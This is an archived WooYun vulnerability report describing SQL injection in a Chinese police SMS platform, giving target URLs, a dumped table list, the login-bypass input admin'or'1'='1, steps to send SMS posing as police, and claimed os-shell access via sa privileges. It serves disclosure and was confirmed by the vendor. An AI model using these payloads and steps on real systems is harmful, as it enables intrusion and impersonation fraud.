当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125756

漏洞标题:看我如何以公安身份给任意用户发诈骗短信+sa权限sql注射(服务器沦陷/内网安全)

相关厂商:某敏感部门

漏洞作者: 路人甲

提交时间:2015-07-10 09:59

修复时间:2015-08-27 13:50

公开时间:2015-08-27 13:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认,细节仅向厂商公开
2015-07-23: 细节向核心白帽子及相关领域专家公开
2015-08-02: 细节向普通白帽子公开
2015-08-12: 细节向实习白帽子公开
2015-08-27: 细节向公众公开

简要描述:

看我如何以公安身份给任意用户发诈骗短信+sa权限sql注射

详细说明:

先说注射

注入点:http://www.hajz.cn/sms/aspx/SmsSendInfor.aspx?ID=3


1.png


3.jpg


current database:    'GreenUmbrella'


5.jpg


Database: GreenUmbrella
[50 tables]
+--------------------------+
| dbo.d_pcommunity |
| dbo.d_policeoffice |
| dbo.d_pope |
| dbo.jh_gsm_sendlist |
| dbo.t_area |
| dbo.t_attribute |
| dbo.t_classiccase |
| dbo.t_consult |
| dbo.t_cyry |
| dbo.t_diarylog |
| dbo.t_dicitem |
| dbo.t_economiccrime |
| dbo.t_gmsUser |
| dbo.t_hyfl |
| dbo.t_information |
| dbo.t_inforservice |
| dbo.t_jg_jbxx |
| dbo.t_jg_pgbg |
| dbo.t_jgjbxx |
| dbo.t_jglryxx |
| dbo.t_jgncz |
| dbo.t_jzfwqy |
| dbo.t_jzllryxx |
| dbo.t_laws |
| dbo.t_links |
| dbo.t_module |
| dbo.t_msg_infor |
| dbo.t_msg_jg |
| dbo.t_myfjxx |
| dbo.t_myreplyxx |
| dbo.t_myryxx |
| dbo.t_myxx |
| dbo.t_onlinkeinformation |
| dbo.t_onlinkfile |
| dbo.t_onlinkunit |
| dbo.t_onlinkuser |
| dbo.t_pageurl |
| dbo.t_picnews |
| dbo.t_platdata |
| dbo.t_qy_user |
| dbo.t_qyxx |
| dbo.t_role |
| dbo.t_roleright |
| dbo.t_ryxx |
| dbo.t_sjzd |
| dbo.t_ssqy |
| dbo.t_sysuser |
| dbo.t_teamcaptain |
| dbo.t_user |
| dbo.t_xxfl |
+--------------------------+


mask 区域
*****GBH	LOG*****
*****^����޹�˾ *****
*****^Ե������*****
*****\xf3���޹�˾ *****
*****^^���޹�˾ *****
*****^���޹�˾ J*****
*****^�ӹ��� JG3*****
*****��޹�˾���^*****
*****^^ͽ��ij� JG32*****
***** JG320800201406140001 ����*****
*****^^˾��������^*****
*****^^����޹�˾ J*****
*****^�����޹�^*****
*****^���޹�˾ JG320*****
*****�����޹�˾*****
*****������޹^*****
*****������ľ�Ӫ*****


这其中的弱口令还望自查
我只看了这一个库,奇特的没敢看,公安部门过于敏感!不要查水表!!
-------------------------------------------------------
然后,给人以用户发短消息!

http://www.hajz.cn/sms/aspx/Login.aspx


admin'or'1'='1密码随意

6.jpg


7.jpg


然后手机号,和内容输完后,没有发送按钮。将鼠标落在手机号哪里,回车即可!

7.jpg


一回车然后就发出去了发出去了。猥琐的给自己发了个短信!

S50709-191242.jpg


----------------------------------------------
由于sa权限直接os-shell

10.jpg

8.jpg

9.jpg


mask 区域
*****est123,你*****


11.jpg


12.jpg


13.jpg


14.jpg


15.jpg

漏洞证明:

未动任何数据,无查水表!!

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-07-13 13:48

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无